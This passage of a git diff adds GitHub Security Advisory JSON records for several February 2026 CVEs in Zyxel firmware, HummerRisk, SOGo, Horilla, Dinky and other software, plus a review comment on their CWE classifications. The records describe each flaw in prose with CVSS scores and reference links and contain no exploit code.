+++++++++++ .../GHSA-qhmq-843h-9vq8.json | 36 +++++++++++ .../GHSA-r8mv-7fwh-cfvr.json | 36 +++++++++++ .../GHSA-v2vh-hr2h-f29r.json | 56 +++++++++++++++++ .../GHSA-vq86-4hgw-x482.json | 52 ++++++++++++++++ .../GHSA-vv96-h3xf-q33j.json | 60 +++++++++++++++++++ .../GHSA-w3pf-j6xr-fj68.json | 56 +++++++++++++++++ .../GHSA-x6c4-87pg-m84f.json | 36 +++++++++++ .../GHSA-xqg5-5x64-93r9.json | 56 +++++++++++++++++ 19 files changed, 876 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-2fmw-p7gw-97jj/GHSA-2fmw-p7gw-97jj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-38jp-gj76-pm7x/GHSA-38jp-gj76-pm7x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-47ph-5j6m-fmgx/GHSA-47ph-5j6m-fmgx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-57jm-2xq8-jwj3/GHSA-57jm-2xq8-jwj3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7w2h-4285-9pwr/GHSA-7w2h-4285-9pwr.json 
create mode 100644 advisories/unreviewed/2026/02/GHSA-934v-v4wh-rf2c/GHSA-934v-v4wh-rf2c.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-cqj6-j4f4-mcpp/GHSA-cqj6-j4f4-mcpp.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-f256-j3x2-h7wh/GHSA-f256-j3x2-h7wh.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-fj46-cfm8-7pc4/GHSA-fj46-cfm8-7pc4.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-m8fj-fqgq-fj22/GHSA-m8fj-fqgq-fj22.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-mg73-f2jm-wph7/GHSA-mg73-f2jm-wph7.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-qhmq-843h-9vq8/GHSA-qhmq-843h-9vq8.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-r8mv-7fwh-cfvr/GHSA-r8mv-7fwh-cfvr.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-v2vh-hr2h-f29r/GHSA-v2vh-hr2h-f29r.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-vq86-4hgw-x482/GHSA-vq86-4hgw-x482.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-vv96-h3xf-q33j/GHSA-vv96-h3xf-q33j.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-w3pf-j6xr-fj68/GHSA-w3pf-j6xr-fj68.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-x6c4-87pg-m84f/GHSA-x6c4-87pg-m84f.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-xqg5-5x64-93r9/GHSA-xqg5-5x64-93r9.json
diff --git a/advisories/unreviewed/2026/02/GHSA-2fmw-p7gw-97jj/GHSA-2fmw-p7gw-97jj.json b/advisories/unreviewed/2026/02/GHSA-2fmw-p7gw-97jj/GHSA-2fmw-p7gw-97jj.json
new file mode 100644
index 0000000000000..78898122ca9b6
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-2fmw-p7gw-97jj/GHSA-2fmw-p7gw-97jj.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2fmw-p7gw-97jj",
+ "modified": "2026-02-24T03:30:19Z",
+ "published": "2026-02-24T03:30:19Z",
+ "aliases": [
+ "CVE-2025-11845"
+ ],
+ "details": "A null pointer dereference vulnerability in the certificate downloader CGI program of the Zyxel VMG3625-T50B firmware versions through 5.50(ABPM.9.6)C0 and the Zyxel WX3100-T0 firmware versions through 5.50(ABVL.4.8)C0 could allow an authenticated attacker with administrator privileges to trigger a denial-of-service (DoS) condition by sending a crafted HTTP request.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11845"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-null-pointer-dereference-and-command-injection-vulnerabilities-in-certain-4g-lte-5g-nr-cpe-dsl-ethernet-cpe-fiber-onts-security-routers-and-wireless-extenders-02-24-2026"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-476"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T02:15:59Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-38jp-gj76-pm7x/GHSA-38jp-gj76-pm7x.json b/advisories/unreviewed/2026/02/GHSA-38jp-gj76-pm7x/GHSA-38jp-gj76-pm7x.json
new file mode 100644
index 0000000000000..1f0f8e77f3086
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-38jp-gj76-pm7x/GHSA-38jp-gj76-pm7x.json
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-38jp-gj76-pm7x",
+ "modified": "2026-02-24T03:30:20Z",
+ "published": "2026-02-24T03:30:20Z",
+ "aliases": [
+ "CVE-2026-3064"
+ ],
+ "details": "A security vulnerability has been detected in HummerRisk up to 1.5.0. Affected by this issue is some unknown functionality of the file ResourceCreateService.java of the component Cloud Task Scheduler. Such manipulation of the argument regionId leads to command injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3064"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/AnalogyC0de/public_exp/issues/8"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347415"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347415"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.757695"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-74"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T03:16:03Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-47ph-5j6m-fmgx/GHSA-47ph-5j6m-fmgx.json b/advisories/unreviewed/2026/02/GHSA-47ph-5j6m-fmgx/GHSA-47ph-5j6m-fmgx.json
new file mode 100644
index 0000000000000..ae9be4f181320
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-47ph-5j6m-fmgx/GHSA-47ph-5j6m-fmgx.json
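Review bot: GHSA-38jp-gj76-pm7x.json classifies a command injection through `regionId` only under the generic parent `"CWE-74"`, and GHSA-57jm-2xq8-jwj3.json later in this patch does the same for a SQL injection through `profile_id`. Triage rules and dashboards keyed on the specific weakness classes will not match either record. If the sync may refine the upstream value, `"CWE-77"` for the first and `"CWE-89"` for the second match what each details text states; otherwise consumers should expand CWE-74 to its child classes when filtering.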
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-47ph-5j6m-fmgx",
+ "modified": "2026-02-24T03:30:20Z",
+ "published": "2026-02-24T03:30:20Z",
+ "aliases": [
+ "CVE-2026-3054"
+ ],
+ "details": "A vulnerability was identified in Alinto SOGo 5.12.3/5.12.4. This impacts an unknown function. The manipulation of the argument hint leads to cross site scripting. The attack can be initiated remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3054"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347412"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347412"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.757609"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T03:16:02Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-57jm-2xq8-jwj3/GHSA-57jm-2xq8-jwj3.json b/advisories/unreviewed/2026/02/GHSA-57jm-2xq8-jwj3/GHSA-57jm-2xq8-jwj3.json
new file mode 100644
index 0000000000000..a9247e68c45e5
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-57jm-2xq8-jwj3/GHSA-57jm-2xq8-jwj3.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-57jm-2xq8-jwj3",
+ "modified": "2026-02-24T03:30:19Z",
+ "published": "2026-02-24T03:30:19Z",
+ "aliases": [
+ "CVE-2026-3046"
+ ],
+ "details": "A security vulnerability has been detected in itsourcecode E-Logbook with Health Monitoring System for COVID-19 1.0. This vulnerability affects unknown code of the file /check_profile_old.php. The manipulation of the argument profile_id leads to sql injection. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3046"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/ltranquility/cve_submit/issues/3"
+ },
+ {
+ "type": "WEB",
+ "url": "https://itsourcecode.com"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347406"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347406"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.757247"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-74"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T01:16:15Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-7w2h-4285-9pwr/GHSA-7w2h-4285-9pwr.json b/advisories/unreviewed/2026/02/GHSA-7w2h-4285-9pwr/GHSA-7w2h-4285-9pwr.json
new file mode 100644
index 0000000000000..37bef67de82db
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-7w2h-4285-9pwr/GHSA-7w2h-4285-9pwr.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-7w2h-4285-9pwr",
+ "modified": "2026-02-24T03:30:19Z",
+ "published": "2026-02-24T03:30:19Z",
+ "aliases": [
+ "CVE-2025-9120"
+ ],
+ "details": "Improper Control of Generation of Code ('Code Injection') vulnerability in OpenText™ Carbonite Safe Server Backup allows Code Injection. \n\nThe vulnerability could be exploited through an open port, potentially allowing unauthorized access.\n\nThis issue affects Carbonite Safe Server Backup: through 6.8.3.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9120"
+ },
+ {
+ "type": "WEB",
+ "url": "https://support.carbonite.com/articles/Security-Bulletin-for-Carbonite-Safe-Server-Backup-09-12-2025"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-94"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T01:16:12Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-934v-v4wh-rf2c/GHSA-934v-v4wh-rf2c.json b/advisories/unreviewed/2026/02/GHSA-934v-v4wh-rf2c/GHSA-934v-v4wh-rf2c.json
new file mode 100644
index 0000000000000..f999ebc08ab1a
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-934v-v4wh-rf2c/GHSA-934v-v4wh-rf2c.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-934v-v4wh-rf2c",
+ "modified": "2026-02-24T03:30:20Z",
+ "published": "2026-02-24T03:30:20Z",
+ "aliases": [
+ "CVE-2025-13942"
+ ],
+ "details": "A command injection vulnerability in the UPnP function of the Zyxel EX3510-B0 firmware versions through 5.17(ABUP.15.1)C0 could allow a remote attacker to execute operating system (OS) commands on an affected device by sending specially crafted UPnP SOAP requests.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13942"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-null-pointer-dereference-and-command-injection-vulnerabilities-in-certain-4g-lte-5g-nr-cpe-dsl-ethernet-cpe-fiber-onts-security-routers-and-wireless-extenders-02-24-2026"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-78"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T03:16:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-cqj6-j4f4-mcpp/GHSA-cqj6-j4f4-mcpp.json b/advisories/unreviewed/2026/02/GHSA-cqj6-j4f4-mcpp/GHSA-cqj6-j4f4-mcpp.json
new file mode 100644
index 0000000000000..c486980d6d2ae
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-cqj6-j4f4-mcpp/GHSA-cqj6-j4f4-mcpp.json
@@ -0,0 +1,60 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cqj6-j4f4-mcpp",
+ "modified": "2026-02-24T03:30:19Z",
+ "published": "2026-02-24T03:30:19Z",
+ "aliases": [
+ "CVE-2026-3049"
+ ],
+ "details": "A vulnerability was detected in horilla-opensource horilla up to 1.0.2. This issue affects the function get of the file horilla_generics/global_search.py of the component Query Parameter Handler. The manipulation of the argument prev_url results in open redirect. The attack can be executed remotely. The exploit is now public and may be used. Upgrading to version 1.0.3 is capable of addressing this issue. The patch is identified as 730b5a44ff060916780c44a4bdbc8ced70a2cd27. The affected component should be upgraded.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3049"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/horilla-opensource/horilla-crm/commit/730b5a44ff060916780c44a4bdbc8ced70a2cd27"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Stolichnayer/Horilla-CRM-Open-Redirect"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/horilla-opensource/horilla-crm/releases/tag/1.0.3"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347407"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347407"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.757296"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-601"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T01:16:16Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-f256-j3x2-h7wh/GHSA-f256-j3x2-h7wh.json b/advisories/unreviewed/2026/02/GHSA-f256-j3x2-h7wh/GHSA-f256-j3x2-h7wh.json
new file mode 100644
index 0000000000000..c72a5f61b9c52
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-f256-j3x2-h7wh/GHSA-f256-j3x2-h7wh.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-f256-j3x2-h7wh",
+ "modified": "2026-02-24T03:30:19Z",
+ "published": "2026-02-24T03:30:19Z",
+ "aliases": [
+ "CVE-2026-3051"
+ ],
+ "details": "A vulnerability has been found in DataLinkDC dinky up to 1.2.5. The affected element is the function getProjectDir of the file dinky-admin/src/main/java/org/dinky/utils/GitRepository.java of the component Project Name Handler. Such manipulation of the argument projectName leads to path traversal. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3051"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/AnalogyC0de/public_exp/issues/5"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/AnalogyC0de/public_exp/issues/5#issue-3935000629"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347409"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347409"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.757586"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-22"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T01:16:16Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-fj46-cfm8-7pc4/GHSA-fj46-cfm8-7pc4.json b/advisories/unreviewed/2026/02/GHSA-fj46-cfm8-7pc4/GHSA-fj46-cfm8-7pc4.json
new file mode 100644
index 0000000000000..d1a51ec968b1c
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-fj46-cfm8-7pc4/GHSA-fj46-cfm8-7pc4.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-fj46-cfm8-7pc4",
+ "modified": "2026-02-24T03:30:20Z",
+ "published": "2026-02-24T03:30:20Z",
+ "aliases": [
+ "CVE-2026-3091"
+ ],
+ "details": "An uncontrolled search path element vulnerability in Synology Presto Client before 2.1.3-0672 allows local users to read or write arbitrary files during installation by placing a malicious DLL in advance in the same directory as the installer.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3091"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.synology.com/en-global/security/advisory/Synology_SA_26_02"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-427"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T03:16:03Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-m8fj-fqgq-fj22/GHSA-m8fj-fqgq-fj22.json b/advisories/unreviewed/2026/02/GHSA-m8fj-fqgq-fj22/GHSA-m8fj-fqgq-fj22.json
new file mode 100644
index 0000000000000..90ad501c5d4be
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-m8fj-fqgq-fj22/GHSA-m8fj-fqgq-fj22.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-m8fj-fqgq-fj22",
+ "modified": "2026-02-24T03:30:20Z",
+ "published": "2026-02-24T03:30:20Z",
+ "aliases": [
+ "CVE-2025-11848"
+ ],
+ "details": "A null pointer dereference vulnerability in the Wake-on-LAN CGI program of the Zyxel VMG3625-T50B firmware version through 5.50(ABPM.9.6)C0 and the Zyxel WX3100-T0 firmware versions through 5.50(ABVL.4.8)C0 could allow an authenticated attacker with administrator privileges to trigger a denial-of-service (DoS) condition by sending a crafted HTTP request.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11848"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-null-pointer-dereference-and-command-injection-vulnerabilities-in-certain-4g-lte-5g-nr-cpe-dsl-ethernet-cpe-fiber-onts-security-routers-and-wireless-extenders-02-24-2026"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-476"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T03:16:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-mg73-f2jm-wph7/GHSA-mg73-f2jm-wph7.json b/advisories/unreviewed/2026/02/GHSA-mg73-f2jm-wph7/GHSA-mg73-f2jm-wph7.json
new file mode 100644
index 0000000000000..6dc2cee150369
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-mg73-f2jm-wph7/GHSA-mg73-f2jm-wph7.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mg73-f2jm-wph7",
+ "modified": "2026-02-24T03:30:20Z",
+ "published": "2026-02-24T03:30:20Z",
+ "aliases": [
+ "CVE-2025-13943"
+ ],
+ "details": "A post-authentication command injection vulnerability in the log file download function of the Zyxel EX3301-T0 firmware versions through 5.50(ABVY.7)C0 could allow an authenticated attacker to execute operating system (OS) commands on an affected device.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13943"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-null-pointer-dereference-and-command-injection-vulnerabilities-in-certain-4g-lte-5g-nr-cpe-dsl-ethernet-cpe-fiber-onts-security-routers-and-wireless-extenders-02-24-2026"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-78"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T03:16:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-qhmq-843h-9vq8/GHSA-qhmq-843h-9vq8.json b/advisories/unreviewed/2026/02/GHSA-qhmq-843h-9vq8/GHSA-qhmq-843h-9vq8.json
new file mode 100644
index 0000000000000..532005eb8a25f
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-qhmq-843h-9vq8/GHSA-qhmq-843h-9vq8.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qhmq-843h-9vq8",
+ "modified": "2026-02-24T03:30:20Z",
+ "published": "2026-02-24T03:30:20Z",
+ "aliases": [
+ "CVE-2025-11847"
+ ],
+ "details": "A null pointer dereference vulnerability in the IP settings CGI program of the Zyxel VMG3625-T50B firmware versions through 5.50(ABPM.9.6)C0 and the Zyxel WX3100-T0 firmware versions through 5.50(ABVL.4.8)C0 could allow an authenticated attacker with administrator privileges to trigger a denial-of-service (DoS) condition by sending a crafted HTTP request.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11847"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-null-pointer-dereference-and-command-injection-vulnerabilities-in-certain-4g-lte-5g-nr-cpe-dsl-ethernet-cpe-fiber-onts-security-routers-and-wireless-extenders-02-24-2026"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-476"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T03:15:59Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-r8mv-7fwh-cfvr/GHSA-r8mv-7fwh-cfvr.json b/advisories/unreviewed/2026/02/GHSA-r8mv-7fwh-cfvr/GHSA-r8mv-7fwh-cfvr.json
new file mode 100644
index 0000000000000..c02024c28c159
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-r8mv-7fwh-cfvr/GHSA-r8mv-7fwh-cfvr.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-r8mv-7fwh-cfvr",
+ "modified": "2026-02-24T03:30:19Z",
+ "published": "2026-02-24T03:30:19Z",
+ "aliases": [
+ "CVE-2025-11846"
+ ],
+ "details": "A null pointer dereference vulnerability in the account settings CGI program of the Zyxel VMG3625-T50B firmware versions through 5.50(ABPM.9.6)C0 and the Zyxel WX3100-T0 firmware versions through 5.50(ABVL.4.8)C0 could allow an authenticated attacker with administrator privileges to trigger a denial-of-service (DoS) condition by sending a crafted HTTP request.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11846"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-null-pointer-dereference-and-command-injection-vulnerabilities-in-certain-4g-lte-5g-nr-cpe-dsl-ethernet-cpe-fiber-onts-security-routers-and-wireless-extenders-02-24-2026"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-476"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T02:16:00Z"
+ }
+}
\ No newline at end of file
